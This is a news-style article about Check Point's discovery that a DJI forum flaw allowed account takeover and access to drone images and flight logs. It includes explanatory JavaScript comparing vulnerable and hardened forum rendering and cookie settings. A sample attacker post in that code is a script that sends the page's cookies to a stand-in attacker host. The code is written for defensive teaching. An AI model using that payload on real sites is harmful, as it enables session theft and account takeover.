Let's start with the conclusion: update your DJI drone software.
Check Point's researchers continue to find weaknesses in products that are widely used by organizations such as police forces and militaries, as well as by private users. This time the subject is DJI, the most recognized drone manufacturer on the market today.
Check Point found that an attacker could gain access to a user's DJI account and, through it, to the drone: the images it captured and a real-time view of what the drone is doing. In addition, the attacker could obtain the drone's flight position history from a flight log stored on the device.
The flaw that enables the attack is in a DJI forum where registered users discuss the company's products and get help from other users. A logged-in user clicks a link that the attacker has planted in the forum, and at that moment the user's account information is in the attacker's hands. The link looks completely innocent and appears to have been posted by a real user.
Once that login data is received, the attacker takes control of the account, which means he can make purchases in the online store, send messages in the user's name and, of course, access the DJI cloud services.
On the Check Point website, the researchers describe how they found the weakness: the DJI site relied on a login cookie, and possession of that cookie was enough to retrieve user information, which was itself stored in a way that was far from secure, so that sensitive user data reached the attacker without difficulty. They also explain the takeover step by step and show how the same weaknesses could be exploited both through the DJI mobile app and through the regular site when browsing from a desktop.
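To make the mechanism above concrete, here is an added illustrative model of the attack class the article describes: a forum page that shows user-posted content, and a login cookie that page script can read. This is not DJI's or Check Point's code, and the article does not say exactly which forum flaw was used; the forum markup, the cookie name "session" and the attacker's post are assumptions chosen for illustration. The example pairs the weak rendering and cookie settings with hardened ones so the difference can be checked directly.

```javascript
// Added illustrative example (not DJI's or Check Point's code).
// Models the class of flaw the article describes: a forum page that renders
// user-supplied content, and a login cookie readable by page script.
// Forum markup, the cookie name "session" and the payload are assumptions.

// Constructed attacker post: looks like a helpful link but carries script.
const ATTACKER_POST =
  'Flight log here: <a href="https://example.invalid/log">log</a>' +
  '<script>fetch("https://attacker.invalid/c?" + document.cookie)</script>';

// Vulnerable renderer: drops the post body into the page HTML unchanged,
// so whatever the attacker wrote becomes part of the page and runs.
function renderPostVulnerable(body) {
  return `<div class="post">${body}</div>`;
}

// Minimal HTML escaping for text placed inside an element body.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return text.replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened renderer: the same post is shown as literal text, so the
// <script> tag is displayed to the reader rather than executed.
function renderPostSafe(body) {
  return `<div class="post">${escapeHtml(body)}</div>`;
}

// Crude check used below: does the rendered HTML contain a live script
// element or an inline event-handler attribute?
function containsActiveScript(html) {
  return /<script\b/i.test(html) || /\s+on\w+\s*=/i.test(html);
}

// Weak Set-Cookie value: no HttpOnly/Secure/SameSite, so any script running
// on the page (including the attacker's) can read it via document.cookie.
function sessionCookieWeak(token) {
  return `session=${token}; Path=/`;
}

// Hardened Set-Cookie value: HttpOnly keeps it out of document.cookie,
// Secure restricts it to HTTPS, SameSite=Lax limits cross-site sending.
function sessionCookieHardened(token) {
  return `session=${token}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// Approximates what document.cookie would expose for a list of Set-Cookie
// header values: every cookie that lacks the HttpOnly attribute.
function scriptVisibleCookies(setCookieValues) {
  return setCookieValues
    .filter((v) => !/;\s*HttpOnly\s*(;|$)/i.test(v))
    .map((v) => v.split(';')[0].trim());
}

// Ties it together: given a post, a Set-Cookie value and a renderer, returns
// the cookie pairs the attacker's script could exfiltrate. An empty list means
// either the rendering neutralised the script or the cookie was unreadable.
function simulateTakeover(post, setCookieValue, render) {
  const html = render(post);
  if (!containsActiveScript(html)) return [];
  return scriptVisibleCookies([setCookieValue]);
}

console.log(simulateTakeover(ATTACKER_POST, sessionCookieWeak('abc123'), renderPostVulnerable));
console.log(simulateTakeover(ATTACKER_POST, sessionCookieHardened('abc123'), renderPostVulnerable));
console.log(simulateTakeover(ATTACKER_POST, sessionCookieWeak('abc123'), renderPostSafe));
```

The HttpOnly attribute only stops the cookie value from being copied out; an injected script can still issue requests from the victim's page with the cookie attached automatically, so output encoding of user content is the fix that matters, and the cookie attributes are a second layer that limits the damage when encoding is missed.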
DJI fixed the vulnerability once it received the details from Check Point's researchers, which is why it is important to keep both the drone's firmware and the DJI software (the mobile app and web account) updated to the latest versions.